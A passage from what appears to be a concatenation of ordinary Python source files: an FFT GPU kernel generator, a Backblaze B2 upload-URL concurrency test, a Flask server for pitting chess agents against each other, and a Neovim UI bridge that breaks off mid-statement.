NS(length=[4,16], factors=[[2,2],[4,4]], threads_per_transform=[2,4], threads_per_block=32),
NS(length=[4,25], factors=[[2,2],[5,5]], threads_per_transform=[2,5], threads_per_block=50),
NS(length=[4,27], factors=[[2,2],[3,3,3]], threads_per_transform=[2,9], threads_per_block=54),
NS(length=[4,32], factors=[[2,2],[8,4]], threads_per_transform=[2,4], threads_per_block=64),
NS(length=[4,64], factors=[[2,2],[4,4,4]], threads_per_transform=[2,16], threads_per_block=128),
NS(length=[4,81], factors=[[2,2],[3,3,3,3]], threads_per_transform=[2,27], threads_per_block=162),
NS(length=[4,125], factors=[[2,2],[5,5,5]], threads_per_transform=[2,25], threads_per_block=250),
NS(length=[4,128], factors=[[2,2],[8,4,4]], threads_per_transform=[2,16], threads_per_block=256),
NS(length=[4,243], factors=[[2,2],[3,3,3,3,3]], threads_per_transform=[2,81], threads_per_block=486),
NS(length=[4,256], factors=[[2,2],[4,4,4,4]], threads_per_transform=[2,64], threads_per_block=512),
NS(length=[8,4], factors=[[4,2],[2,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[8,8], factors=[[4,2],[4,2]], threads_per_transform=[2,2], threads_per_block=16),
NS(length=[8,9], factors=[[4,2],[3,3]], threads_per_transform=[2,3], threads_per_block=24),
NS(length=[8,16], factors=[[4,2],[4,4]], threads_per_transform=[2,4], threads_per_block=32),
NS(length=[8,25], factors=[[4,2],[5,5]], threads_per_transform=[2,5], threads_per_block=50),
NS(length=[8,27], factors=[[4,2],[3,3,3]], threads_per_transform=[2,9], threads_per_block=72),
NS(length=[8,32], factors=[[4,2],[8,4]], threads_per_transform=[2,4], threads_per_block=64),
NS(length=[8,64], factors=[[4,2],[4,4,4]], threads_per_transform=[2,16], threads_per_block=128),
NS(length=[8,81], factors=[[4,2],[3,3,3,3]], threads_per_transform=[2,27], threads_per_block=216),
NS(length=[8,125], factors=[[4,2],[5,5,5]], threads_per_transform=[2,25], threads_per_block=250),
NS(length=[8,128], factors=[[4,2],[8,4,4]], threads_per_transform=[2,16], threads_per_block=256),
NS(length=[8,243], factors=[[4,2],[3,3,3,3,3]], threads_per_transform=[2,81], threads_per_block=648),
NS(length=[8,256], factors=[[4,2],[4,4,4,4]], threads_per_transform=[2,64], threads_per_block=512),
NS(length=[9,4], factors=[[3,3],[2,2]], threads_per_transform=[3,2], threads_per_block=18),
NS(length=[9,8], factors=[[3,3],[4,2]], threads_per_transform=[3,2], threads_per_block=24),
NS(length=[9,9], factors=[[3,3],[3,3]], threads_per_transform=[3,3], threads_per_block=27),
NS(length=[9,16], factors=[[3,3],[4,4]], threads_per_transform=[3,4], threads_per_block=48),
NS(length=[9,25], factors=[[3,3],[5,5]], threads_per_transform=[3,5], threads_per_block=75),
NS(length=[9,27], factors=[[3,3],[3,3,3]], threads_per_transform=[3,9], threads_per_block=81),
NS(length=[9,32], factors=[[3,3],[8,4]], threads_per_transform=[3,4], threads_per_block=96),
NS(length=[9,64], factors=[[3,3],[4,4,4]], threads_per_transform=[3,16], threads_per_block=192),
NS(length=[9,81], factors=[[3,3],[3,3,3,3]], threads_per_transform=[3,27], threads_per_block=243),
NS(length=[9,125], factors=[[3,3],[5,5,5]], threads_per_transform=[3,25], threads_per_block=375),
NS(length=[9,128], factors=[[3,3],[8,4,4]], threads_per_transform=[3,16], threads_per_block=384),
NS(length=[9,243], factors=[[3,3],[3,3,3,3,3]], threads_per_transform=[3,81], threads_per_block=729),
NS(length=[9,256], factors=[[3,3],[4,4,4,4]], threads_per_transform=[3,64], threads_per_block=768),
NS(length=[16,4], factors=[[4,4],[2,2]], threads_per_transform=[4,2], threads_per_block=32),
NS(length=[16,8], factors=[[4,4],[4,2]], threads_per_transform=[4,2], threads_per_block=32),
NS(length=[16,9], factors=[[4,4],[3,3]], threads_per_transform=[4,3], threads_per_block=48),
NS(length=[16,16], factors=[[4,4],[4,4]], threads_per_transform=[4,4], threads_per_block=64),
NS(length=[16,25], factors=[[4,4],[5,5]], threads_per_transform=[4,5], threads_per_block=100),
NS(length=[16,27], factors=[[4,4],[3,3,3]], threads_per_transform=[4,9], threads_per_block=144),
NS(length=[16,32], factors=[[4,4],[8,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[16,64], factors=[[4,4],[4,4,4]], threads_per_transform=[4,16], threads_per_block=256),
NS(length=[16,81], factors=[[4,4],[3,3,3,3]], threads_per_transform=[4,27], threads_per_block=432),
NS(length=[16,125], factors=[[4,4],[5,5,5]], threads_per_transform=[4,25], threads_per_block=500),
NS(length=[16,128], factors=[[4,4],[8,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[25,4], factors=[[5,5],[2,2]], threads_per_transform=[5,2], threads_per_block=50),
NS(length=[25,8], factors=[[5,5],[4,2]], threads_per_transform=[5,2], threads_per_block=50),
NS(length=[25,9], factors=[[5,5],[3,3]], threads_per_transform=[5,3], threads_per_block=75),
NS(length=[25,16], factors=[[5,5],[4,4]], threads_per_transform=[5,4], threads_per_block=100),
NS(length=[25,25], factors=[[5,5],[5,5]], threads_per_transform=[5,5], threads_per_block=125),
NS(length=[25,27], factors=[[5,5],[3,3,3]], threads_per_transform=[5,9], threads_per_block=225),
NS(length=[25,32], factors=[[5,5],[8,4]], threads_per_transform=[5,4], threads_per_block=160),
NS(length=[25,64], factors=[[5,5],[4,4,4]], threads_per_transform=[5,16], threads_per_block=400),
NS(length=[25,81], factors=[[5,5],[3,3,3,3]], threads_per_transform=[5,27], threads_per_block=675),
NS(length=[25,125], factors=[[5,5],[5,5,5]], threads_per_transform=[5,25], threads_per_block=625),
NS(length=[25,128], factors=[[5,5],[8,4,4]], threads_per_transform=[5,16], threads_per_block=640),
NS(length=[27,4], factors=[[3,3,3],[2,2]], threads_per_transform=[9,2], threads_per_block=54),
NS(length=[27,8], factors=[[3,3,3],[4,2]], threads_per_transform=[9,2], threads_per_block=72),
NS(length=[27,9], factors=[[3,3,3],[3,3]], threads_per_transform=[9,3], threads_per_block=81),
NS(length=[27,16], factors=[[3,3,3],[4,4]], threads_per_transform=[9,4], threads_per_block=144),
NS(length=[27,25], factors=[[3,3,3],[5,5]], threads_per_transform=[9,5], threads_per_block=225),
NS(length=[27,27], factors=[[3,3,3],[3,3,3]], threads_per_transform=[9,9], threads_per_block=243),
NS(length=[27,32], factors=[[3,3,3],[8,4]], threads_per_transform=[9,4], threads_per_block=288),
NS(length=[27,64], factors=[[3,3,3],[4,4,4]], threads_per_transform=[9,16], threads_per_block=576),
NS(length=[27,81], factors=[[3,3,3],[3,3,3,3]], threads_per_transform=[9,27], threads_per_block=729),
NS(length=[32,4], factors=[[8,4],[2,2]], threads_per_transform=[4,2], threads_per_block=64),
NS(length=[32,8], factors=[[8,4],[4,2]], threads_per_transform=[4,2], threads_per_block=64),
NS(length=[32,9], factors=[[8,4],[3,3]], threads_per_transform=[4,3], threads_per_block=96),
NS(length=[32,16], factors=[[8,4],[4,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[32,25], factors=[[8,4],[5,5]], threads_per_transform=[4,5], threads_per_block=160),
NS(length=[32,27], factors=[[8,4],[3,3,3]], threads_per_transform=[4,9], threads_per_block=288),
NS(length=[32,32], factors=[[8,4],[8,4]], threads_per_transform=[4,4], threads_per_block=128),
NS(length=[32,64], factors=[[8,4],[4,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[32,81], factors=[[8,4],[3,3,3,3]], threads_per_transform=[4,27], threads_per_block=864),
NS(length=[32,125], factors=[[8,4],[5,5,5]], threads_per_transform=[4,25], threads_per_block=800),
NS(length=[32,128], factors=[[8,4],[8,4,4]], threads_per_transform=[4,16], threads_per_block=512),
NS(length=[64,4], factors=[[4,4,4],[2,2]], threads_per_transform=[16,2], threads_per_block=128),
NS(length=[64,8], factors=[[4,4,4],[4,2]], threads_per_transform=[16,2], threads_per_block=128),
NS(length=[64,9], factors=[[4,4,4],[3,3]], threads_per_transform=[16,3], threads_per_block=192),
NS(length=[64,16], factors=[[4,4,4],[4,4]], threads_per_transform=[16,4], threads_per_block=256),
NS(length=[64,25], factors=[[4,4,4],[5,5]], threads_per_transform=[16,5], threads_per_block=400),
NS(length=[64,27], factors=[[4,4,4],[3,3,3]], threads_per_transform=[16,9], threads_per_block=576),
NS(length=[64,32], factors=[[4,4,4],[8,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[81,4], factors=[[3,3,3,3],[2,2]], threads_per_transform=[27,2], threads_per_block=162),
NS(length=[81,8], factors=[[3,3,3,3],[4,2]], threads_per_transform=[27,2], threads_per_block=216),
NS(length=[81,9], factors=[[3,3,3,3],[3,3]], threads_per_transform=[27,3], threads_per_block=243),
NS(length=[81,16], factors=[[3,3,3,3],[4,4]], threads_per_transform=[27,4], threads_per_block=432),
NS(length=[81,25], factors=[[3,3,3,3],[5,5]], threads_per_transform=[27,5], threads_per_block=675),
NS(length=[81,27], factors=[[3,3,3,3],[3,3,3]], threads_per_transform=[27,9], threads_per_block=729),
NS(length=[81,32], factors=[[3,3,3,3],[8,4]], threads_per_transform=[27,4], threads_per_block=864),
NS(length=[125,4], factors=[[5,5,5],[2,2]], threads_per_transform=[25,2], threads_per_block=250),
NS(length=[125,8], factors=[[5,5,5],[4,2]], threads_per_transform=[25,2], threads_per_block=250),
NS(length=[125,9], factors=[[5,5,5],[3,3]], threads_per_transform=[25,3], threads_per_block=375),
NS(length=[125,16], factors=[[5,5,5],[4,4]], threads_per_transform=[25,4], threads_per_block=500),
NS(length=[125,25], factors=[[5,5,5],[5,5]], threads_per_transform=[25,5], threads_per_block=625),
NS(length=[125,32], factors=[[5,5,5],[8,4]], threads_per_transform=[25,4], threads_per_block=800),
NS(length=[128,4], factors=[[8,4,4],[2,2]], threads_per_transform=[16,2], threads_per_block=256),
NS(length=[128,8], factors=[[8,4,4],[4,2]], threads_per_transform=[16,2], threads_per_block=256),
NS(length=[128,9], factors=[[8,4,4],[3,3]], threads_per_transform=[16,3], threads_per_block=384),
NS(length=[128,16], factors=[[8,4,4],[4,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[128,25], factors=[[8,4,4],[5,5]], threads_per_transform=[16,5], threads_per_block=640),
NS(length=[128,32], factors=[[8,4,4],[8,4]], threads_per_transform=[16,4], threads_per_block=512),
NS(length=[243,4], factors=[[3,3,3,3,3],[2,2]], threads_per_transform=[81,2], threads_per_block=486),
NS(length=[243,8], factors=[[3,3,3,3,3],[4,2]], threads_per_transform=[81,2], threads_per_block=648),
NS(length=[243,9], factors=[[3,3,3,3,3],[3,3]], threads_per_transform=[81,3], threads_per_block=729),
NS(length=[256,4], factors=[[4,4,4,4],[2,2]], threads_per_transform=[64,2], threads_per_block=512),
NS(length=[256,8], factors=[[4,4,4,4],[4,2]], threads_per_transform=[64,2], threads_per_block=512),
NS(length=[256,9], factors=[[4,4,4,4],[3,3]], threads_per_transform=[64,3], threads_per_block=768),
]
expanded = []
expanded.extend(NS(**kernel.__dict__,
scheme='CS_KERNEL_2D_SINGLE') for kernel in fused_kernels)
return expanded
def list_large_kernels():
"""Return list of large kernels to generate."""
sbcc_kernels = [
NS(length=50, factors=[10, 5], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}, threads_per_block=256),
NS(length=52, factors=[13, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=60, factors=[6, 10], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=64, factors=[8, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=72, factors=[8, 3, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=80, factors=[10, 8], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=81, factors=[3, 3, 3, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=84, factors=[7, 2, 6], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=96, factors=[6, 16], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=100, factors=[5, 5, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=100),
NS(length=104, factors=[13, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=108, factors=[6, 6, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=112, factors=[4, 7, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=128, factors=[8, 4, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}, threads_per_block=256),
NS(length=160, factors=[4, 10, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}, flavour='wide'),
NS(length=168, factors=[7, 6, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=128),
# NS(length=192, factors=[6, 4, 4, 2], use_3steps_large_twd={
# 'sp': 'false', 'dp': 'false'}),
NS(length=200, factors=[8, 5, 5], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=208, factors=[13, 16], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=216, factors=[8, 3, 3, 3], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=224, factors=[8, 7, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=240, factors=[8, 5, 6], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=256, factors=[8, 4, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, flavour='wide'),
NS(length=336, factors=[6, 7, 8], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'})
]
# for SBCC kernel, increase desired threads_per_block so that columns per
# thread block is also increased. currently targeting for 16 columns
block_width = 16
for k in sbcc_kernels:
k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CC'
if not hasattr(k, 'threads_per_block'):
k.threads_per_block = block_width * \
functools.reduce(mul, k.factors, 1) // min(k.factors)
if not hasattr(k, 'length'):
k.length = functools.reduce(lambda a, b: a * b, k.factors)
# SBRC
# still have room to improve...such as 200
sbrc_kernels = [
NS(length=50, factors=[10, 5], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=50, threads_per_transform=5, block_width=10),
# SBRC64: tpb=256 poor in MI50, FIXME: need to investigate why we can't set tpt=8? 61 128 256 fault
NS(length=64, factors=[4, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=128, block_width=16),
NS(length=81, factors=[3, 3, 3, 3], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=81, threads_per_transform=27, block_width=9),
NS(length=100, factors=[5, 5, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=100, threads_per_transform=25, block_width=4),
NS(length=128, factors=[8, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=128, threads_per_transform=16, block_width=8),
# NS(length=128, factors=[8, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=256, threads_per_transform=32, block_width=8), # correctness issue
NS(length=200, factors=[10, 10, 2], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=100, threads_per_transform=10, block_width=10),
NS(length=256, factors=[4, 4, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=256, threads_per_transform=64, block_width=8), # tpt should be 32?
]
# NB:
# Technically, we could have SBCR kernels the same amount as SBCC.
#
# sbcr_kernels = copy.deepcopy(sbcc_kernels)
# for k in sbcr_kernels:
# k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CR'
#
# Just enable length 100 and 200 for now.
sbcr_kernels = [
NS(length=100, factors=[10, 10], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=100),
NS(length=200, factors=[8, 5, 5], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'})
]
block_width = 16
for k in sbcr_kernels:
k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CR'
if not hasattr(k, 'threads_per_block'):
k.threads_per_block = block_width * \
functools.reduce(mul, k.factors, 1) // min(k.factors)
if not hasattr(k, 'length'):
k.length = functools.reduce(lambda a, b: a * b, k.factors)
return sbcc_kernels + sbcr_kernels + sbrc_kernels
def default_runtime_compile(kernels):
'''Returns a copy of input kernel list with a default value for runtime_compile.'''
return [k if hasattr(k, 'runtime_compile') else NS(**k.__dict__, runtime_compile=False) for k in kernels]
def generate_kernel(kernel, precisions, stockham_aot):
"""Generate a single kernel file for 'kernel'.
The kernel file contains all kernel variations corresponding to
the kernel meta data in 'kernel'.
A list of CPU functions is returned.
"""
args = [stockham_aot]
# 2D single kernels always specify threads per transform
if isinstance(kernel.length, list):
args.append(','.join([str(f) for f in kernel.factors[0]]))
args.append(','.join([str(f) for f in kernel.factors[1]]))
args.append(','.join([str(f) for f in kernel.threads_per_transform]))
else:
args.append(','.join([str(f) for f in kernel.factors]))
# 1D kernels might not, and need to default to 'uwide'
threads_per_transform = getattr(kernel,'threads_per_transform', {
'uwide': kernel.length // min(kernel.factors),
'wide': kernel.length // max(kernel.factors),
'tall': 0,
'consolidated': 0
}[getattr(kernel,'flavour', 'uwide')])
args.append(str(threads_per_transform))
# default half_lds to True only for CS_KERNEL_STOCKHAM
half_lds = getattr(kernel, 'half_lds', kernel.scheme == 'CS_KERNEL_STOCKHAM')
filename = kernel_file_name(kernel)
args.append(str(kernel.threads_per_block))
args.append(str(getattr(kernel, 'block_width', 0)))
args.append('1' if half_lds else '0')
args.append(kernel.scheme)
args.append(filename)
proc = subprocess.run(args=args, stdout=subprocess.PIPE, check=True)
clang_format_file(filename)
import json
launchers = json.loads(proc.stdout.decode('ascii'))
cpu_functions = []
data = Variable('data_p', 'const void *')
back = Variable('back_p', 'void *')
for launcher_dict in launchers:
launcher = NS(**launcher_dict)
factors = launcher.factors
length = launcher.lengths[0] if len(launcher.lengths) == 1 else (launcher.lengths[0], launcher.lengths[1])
transforms_per_block = launcher.transforms_per_block
threads_per_block = launcher.threads_per_block
threads_per_transform = threads_per_block // transforms_per_block
half_lds = launcher.half_lds
scheme = launcher.scheme
sbrc_type = launcher.sbrc_type
sbrc_transpose_type = launcher.sbrc_transpose_type
precision = 'dp' if launcher.double_precision else 'sp'
runtime_compile = kernel.runtime_compile
use_3steps_large_twd = getattr(kernel, 'use_3steps_large_twd', None)
block_width = getattr(kernel, 'block_width', 0)
params = LaunchParams(transforms_per_block, threads_per_block, threads_per_transform, half_lds)
# make 2D list of threads_per_transform to populate FFTKernel
tpt_list = kernel.threads_per_transform if scheme == 'CS_KERNEL_2D_SINGLE' else [threads_per_transform, 0]
f = Function(name=launcher.name,
arguments=ArgumentList(data, back),
meta=NS(
factors=factors,
length=length,
params=params,
precision=precision,
runtime_compile=runtime_compile,
scheme=scheme,
threads_per_block=threads_per_block,
transforms_per_block=transforms_per_block,
threads_per_transform=tpt_list,
transpose=sbrc_transpose_type,
use_3steps_large_twd=use_3steps_large_twd,
block_width=block_width,
))
cpu_functions.append(f)
return cpu_functions
def generate_kernels(kernels, precisions, stockham_aot):
"""Generate and write kernels from the kernel list.
Entries in the kernel list are simple namespaces. These are
passed as keyword arguments to the Stockham generator.
A list of CPU functions is returned.
"""
import threading
import queue
# push all the work to a queue
q_in = queue.Queue()
for k in kernels:
q_in.put(k)
# queue for outputs
q_out = queue.Queue()
def threadfunc():
nonlocal q_in
nonlocal q_out
nonlocal precisions
nonlocal stockham_aot
try:
while not q_in.empty():
k = q_in.get()
q_out.put(generate_kernel(k, precisions, stockham_aot))
except queue.Empty:
pass
# by default, start up worker threads. disable this if you want
# to use pdb to debug
use_threads = True
if use_threads:
threads = []
for i in range(os.cpu_count()):
threads.append(threading.Thread(target=threadfunc))
for t in threads:
t.start()
for t in threads:
t.join()
else:
threadfunc()
# iterate over the queue
def queue_iter(q_out):
try:
while not q_out.empty():
yield q_out.get()
except queue.Empty:
pass
return flatten(queue_iter(q_out))
def cli():
"""Command line interface..."""
parser = argparse.ArgumentParser(prog='kernel-generator')
subparsers = parser.add_subparsers(dest='command')
parser.add_argument('--pattern', type=str, help='Kernel pattern to generate.', default='all')
parser.add_argument('--precision', type=str, help='Precision to generate.', default='all')
parser.add_argument('--manual-small', type=str, help='Small kernel sizes to generate.')
parser.add_argument('--manual-large', type=str, help='Large kernel sizes to generate.')
parser.add_argument('--runtime-compile', type=str, help='Allow runtime-compiled kernels.')
list_parser = subparsers.add_parser('list', help='List kernel files that will be generated.')
generate_parser = subparsers.add_parser('generate', help='Generate kernels.')
generate_parser.add_argument('stockham_aot', type=str, help='Stockham AOT executable.')
args = parser.parse_args()
patterns = args.pattern.split(',')
precisions = args.precision.split(',')
if 'all' in precisions:
precisions = ['sp', 'dp']
precisions = [{'single': 'sp', 'double': 'dp'}.get(p, p) for p in precisions]
#
# kernel list
#
kernels = []
# move 2d out from all, no need to iterate the 2d-kernels for non-2d patterns
kernels_2d = list_2d_kernels()
all_kernels = list_small_kernels() + list_large_kernels()
manual_small, manual_large = [], []
if args.manual_small:
manual_small = list(map(int, args.manual_small.split(',')))
if args.manual_large:
manual_large = list(map(int, args.manual_large.split(',')))
if 'all' in patterns and not manual_small and not manual_large:
kernels += all_kernels + kernels_2d
if 'pow2' in patterns:
lengths = [2**x for x in range(13)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow3' in patterns:
lengths = [3**x for x in range(8)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow5' in patterns:
lengths = [5**x for x in range(6)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow7' in patterns:
lengths = [7**x for x in range(5)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'small' in patterns:
schemes = ['CS_KERNEL_STOCKHAM']
kernels += [k for k in all_kernels if k.scheme in schemes]
if 'large' in patterns:
schemes = ['CS_KERNEL_STOCKHAM_BLOCK_CC', 'CS_KERNEL_STOCKHAM_BLOCK_RC', 'CS_KERNEL_STOCKHAM_BLOCK_CR']
kernels += [k for k in all_kernels if k.scheme in schemes]
if '2D' in patterns:
kernels += kernels_2d
if manual_small:
schemes = ['CS_KERNEL_STOCKHAM']
kernels += [k for k in all_kernels if k.length in manual_small and k.scheme in schemes]
if manual_large:
schemes = ['CS_KERNEL_STOCKHAM_BLOCK_CC', 'CS_KERNEL_STOCKHAM_BLOCK_RC', 'CS_KERNEL_STOCKHAM_BLOCK_CR']
kernels += [k for k in all_kernels if k.length in manual_large and k.scheme in schemes]
kernels = unique(kernels)
#
# set runtime compile
#
kernels = default_runtime_compile(kernels)
if args.runtime_compile != 'ON':
for k in kernels:
k.runtime_compile = False
#
# sub commands
#
if args.command == 'list':
scprint(set(['function_pool.cpp'] + list_generated_kernels(kernels)))
if args.command == 'generate':
cpu_functions = generate_kernels(kernels, precisions, args.stockham_aot)
write('function_pool.cpp', generate_cpu_function_pool(cpu_functions), format=True)
if __name__ == '__main__':
cli()
|
test_upload_url_concurrency.py
|
######################################################################
#
# File: b2/account_info/test_upload_conncurrency.py
#
# Copyright 2018 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
import os
import threading
import six
from .sqlite_account_info import SqliteAccountInfo
def test_upload_url_concurrency():
# Clean up from previous tests
file_name = '/tmp/test_upload_conncurrency.db'
try:
os.unlink(file_name)
except OSError:
pass
# Make an account info with a bunch of upload URLs in it.
account_info = SqliteAccountInfo(file_name)
available_urls = set()
for i in six.moves.range(3000):
url = 'url_%d' % i
account_info.put_bucket_upload_url('bucket-id', url, 'auth-token-%d' % i)
available_urls.add(url)
# Pull them all from the account info, from multiple threads
lock = threading.Lock()
def run_thread():
while True:
(url, _) = account_info.take_bucket_upload_url('bucket-id')
if url is None:
break
with lock:
if url in available_urls:
available_urls.remove(url)
else:
print('DOUBLE:', url)
threads = []
for i in six.moves.range(5):
thread = threading.Thread(target=run_thread)
thread.start()
threads.append(thread)
for t in threads:
t.join()
# Check
if len(available_urls) != 0:
print('LEAK:', available_urls)
# Clean up
os.unlink(file_name)
|
pit-server.py
|
import Arena
from MCTS import MCTS
from chess.ChessGame import ChessGame, display
from chess.ChessPlayers import *
from chess.keras.NNet import NNetWrapper as NNet
import numpy as np
from utils import *
from flask import Flask, request, send_from_directory, send_file
from threading import Thread
import json, random, string
"""
use this script to play any two agents against each other, or play manually with
any agent.
"""
ncp_new = "saves/" # Checkpoint path
ncf_new = "checkpoint_2.pth.tar" # Checkpoint file
nca_new = { 'numMCTSSims': 500, 'cpuct': 1.0, 'temp': 0 } # NNet args
#ncp_new = "saves/" # Checkpoint path
#ncf_new = "checkpoint_2.pth.tar" # Checkpoint file
#nca_new = { 'numMCTSSims': 1000, 'cpuct': 1.0, 'temp': 0 } # NNet args
ncp_old = "saves/save-bc5a3cffa65" # Checkpoint path
ncf_old = "best.pth.tar" # Checkpoint file
nca_old = { 'numMCTSSims': 25, 'cpuct': 1.0, 'temp': 0 } # NNet args
class GameWrapper():
def __init__(self, sess_id, p1, p2, gm):
self.g = ChessGame()
self.result_queue = Queue()
self.sess_id = sess_id
self.gm = gm
if p1 == "human":
self.player1 = HumanNetworkChessPlayer(self.g, self.result_queue)
elif p1 == "nnet-new":
self.player1 = NNetNetworkPlayer(self.g, ncp_new, ncf_new, nca_new)
elif p1 == "nnet-old":
self.player1 = NNetNetworkPlayer(self.g, ncp_old, ncf_old, nca_old)
elif p1 == "alpha-beta":
self.player1 = AlphaBetaNetworkPlayer(self.g)
else:
self.player1 = RandomNetworkPlayer(self.g)
if p2 == "human":
self.player2 = HumanNetworkChessPlayer(self.g, self.result_queue)
elif p2 == "nnet-new":
self.player2 = NNetNetworkPlayer(self.g, ncp_new, ncf_new, nca_new)
elif p2 == "nnet-old":
self.player2 = NNetNetworkPlayer(self.g, ncp_old, ncf_old, nca_old)
elif p2 == "alpha-beta":
self.player2 = AlphaBetaNetworkPlayer(self.g)
else:
self.player2 = RandomNetworkPlayer(self.g)
self.p1p = self.player1.play
self.p2p = self.player2.play
def arena_hook(self, result_queue):
arena = Arena.Arena(self.p1p, self.p2p, self.g, display=display, result_queue=result_queue)
arena.playGames(2, verbose=True)
# Dictionary of all the games, key is sess_id, value is GameWrapper class
games = dict()
# Web server code for GUI
app = Flask(__name__, static_url_path='/chess')
@app.route("/new_game", methods=["GET"])
def new_game():
"""
Client is requesting new game, send them their session id and create
new game instance
"""
# Generate a random session id
sess_id = "".join(random.choice(string.ascii_letters + string.digits) for _ in range(16))
player1 = request.args.get("player1")
player2 = request.args.get("player2")
game_mode = request.args.get("game_mode")
# Initialize a new game
new_game = GameWrapper(sess_id, player1, player2, game_mode)
arena = Thread(target=new_game.arena_hook, args=(new_game.result_queue,))
arena.daemon = True
arena.start()
# Add game to dictionary
games[sess_id] = new_game
return sess_id
@app.route("/get_move", methods=["GET"])
def get_move():
sess_id = request.args.get("sess_id")
turn_color = request.args.get("turn")
if turn_color == "w":
move = games[sess_id].player1.queue.get()
else:
move = games[sess_id].player2.queue.get()
move["result"] = games[sess_id].result_queue.get()
return json.dumps(move)
@app.route("/make_move", methods=["POST"])
def make_move():
sess_id = request.form.get("sess_id")
turn_color = request.form.get("turn")
move = request.form.get("move")
if turn_color == "w":
games[sess_id].player1.queue.put(move)
else:
games[sess_id].player2.queue.put(move)
res = games[sess_id].result_queue.get()
return json.dumps({ "result": res })
@app.route("/<path:path>", methods=["GET"])
def serve_static(path):
return send_from_directory('chess', path)
def web_server_hook():
app.run(host='0.0.0.0')
args = dotdict({
'nnet_workers': 2
})
def main():
# Start webserver
web_server = Thread(target=web_server_hook)
web_server.daemon = True
web_server.start()
web_server.join()
if __name__ == "__main__":
main()
|
ui_bridge.py
|
"""Bridge for connecting a UI instance to nvim."""
import sys
from threading import Semaphore, Thread
from traceback import format_exc
class UIBridge(object):
"""UIBridge class. Connects a Nvim instance to a UI class."""
def connect(self, nvim, ui, profile=None, notify=False):
"""Connect nvim and the ui.
This will start loops for handling the UI and nvim events while
also synchronizing both.
"""
self._notify = notify
self._error = None
self._nvim = nvim
self._ui = ui
self._profile = profile
self._sem = Semaphore(0)
t = Thread(target=self._nvim_event_loop)
t.daemon = True
t.start()
self._ui_event_loop()
if self._error:
print(self._error)
if self._profile:
print(self._profile)
def exit(self):
"""Disconnect by exiting nvim."""
self.detach()
self._call(self._nvim.quit)
def input(self, input_str):
"""Send input to nvim."""
self._call(self._nvim.input, input_str)
def resize(self, columns, rows):
"""Send a resize request to nvim."""
self._call(self._nvim.ui_try_resize, columns, rows)
def attach(self, columns, rows, rgb):
"""Attach the UI to nvim."""
self._call(self._nvim.ui_attach, columns, rows, rgb)
def detach(self):
"""Detach the UI from nvim."""
self._call(self._nvim.ui_detach)
def _call(self, fn, *args):
self._nvim.async_call(fn, *args)
def _ui_event_loop(self):
self._sem.acquire()
# if self._profile:
# import StringIO
# import cProfile
# import pstats
# pr = cProfile.Profile()
# pr.enable()
# self._ui.start(self)
# if self._profile:
# pr.disable()
# s = StringIO.StringIO()
# ps = pstats.Stats(pr, stream=s)
# ps.strip_dirs().sort_stats(self._profile).print_stats(30)
# self._profile = s.getvalue()
def _nvim_event_loop(self):
def on_setup():
self._sem.release()
def on_request(method, args):
raise Exception('Not implemented')
def on_notification(method, updates):
def apply_updates():
if self._notify:
sys.stdout.write('attached\n')
sys.stdout.flush()
self._notify = False
try:
for update in updates:
# import sys
# l = [','.join([str(a) for a in args])
# for args in update[1:]]
# print >> sys.stderr, update[0], ' '.join(l)
try:
nvim_handler = getattr(self._ui, 'nvim_handler')
handler = getattr(nvim_handler, '_nvim_' + update[0])
except AttributeError as err:
pass
else:
for args in update[1:]:
handler(*args)
except Exception as err :
